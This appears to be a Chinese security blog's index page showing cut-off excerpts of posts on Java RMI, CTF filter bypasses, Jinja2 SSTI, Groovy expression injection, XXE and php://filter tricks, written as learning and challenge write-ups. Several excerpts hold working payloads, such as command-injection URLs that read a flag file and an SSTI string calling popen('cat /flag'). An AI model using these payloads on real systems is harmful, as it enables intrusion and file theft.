RMI全称是Remote Method Invocation,远程⽅方法调⽤ 是让某个Java虚拟机上的对象调⽤另一个Java虚拟机中对象上的⽅方法,只不不过RMI是Java独 有的⼀一种机制 本质是跨越调用JVM对象方法,跨网络的对象方法调用 RMI 的核心概念 远程对象(Remote Object) 运行在远程 JVM 上的对象,必须继承 UnicastRemoteObject 并实现 Rem…
说在前面 其实是老文章了,但是想到小登都来了,我再好好整整,同时也发现有一些新的姿势,一块整理了不,持续更新 绕过! 类似于str_replace()('flag','')的过滤我们可以使用双写绕过。flflagag把中间的flag替换为空之后还是flag 过滤空格 < 、<>、%09(tab)、%20、$IFS$9、$IFS$1、${IFS}、$IFS等,还可以用{} 比如 {…
Web 396-401 url=http://1/1;echo `ls`>a.txturl=http://1/1;echo `cat fl0g.php`>a.txt 具体函数研究可以看过去文章 Web 402 url=file://1/1;echo `cat fl0g.php`>a.txt 简单一看 <?php$url = 'file://1/1;echo `cat fl0…
赛后拿wp来学习分析 主要是一个请求处理的差异 const { FLAG, SECRET } = process.env;const PORT = 3000;const app = express();app.use(express.urlencoded({ extended: true }));const sleep = d => new Promise(r => setTime…
web easyGooGooVVVY 描述 高松灯是一名java安全初学者,最近她在看groovy表达式注入。。。 搜文章去看了groovy表达式注入,没利用成功 可以打反射或者命令注入 def pb = new ProcessBuilder('printenv')def proc = pb.start()proc.waitFor()def stream = proc.getInputStream…
这篇文章受密码保护,输入密码才能阅读
web361 简单测试一遍 ?name={{7*7}} 回显49证明存在SSTI,是jiaji 无过滤直接上payload吧 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__["popen"]("cat /flag").read()}} 多写几个payload ?name={{lipsum.__glob…
XXE漏洞概述 XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入 XXE漏洞原理 漏洞成因:解析时未对XML外部实体加以限制,导致攻击者将恶意代码注入到XML中,导致服务器加载恶意的外部实体引发文件读取,SSRF,命令执行等危害操作 特征:在HTTP的Request报文出现一下请求报文,即表明此时是采用XML进行数据传输,就可以测试是否存在XM…
baby layout 下载源码: /index.jsimport express from 'express';import session from 'express-session';import rateLimit from 'express-rate-limit';import { randomBytes } from 'crypto';import createDOMPurify fr…
file_put_contents($filename,”<?php exit();”.$content); 前提就是$filename和$content可控 相对简单来说就是要把<? php exit();给干掉 所以我们要利用php://filter协议可以写入文件 那么原理是什么呢? 通过伪协议把文件当作文本流、非 PHP 代码、压缩文件等其他形式解析,从而避免 PHP 正常解析…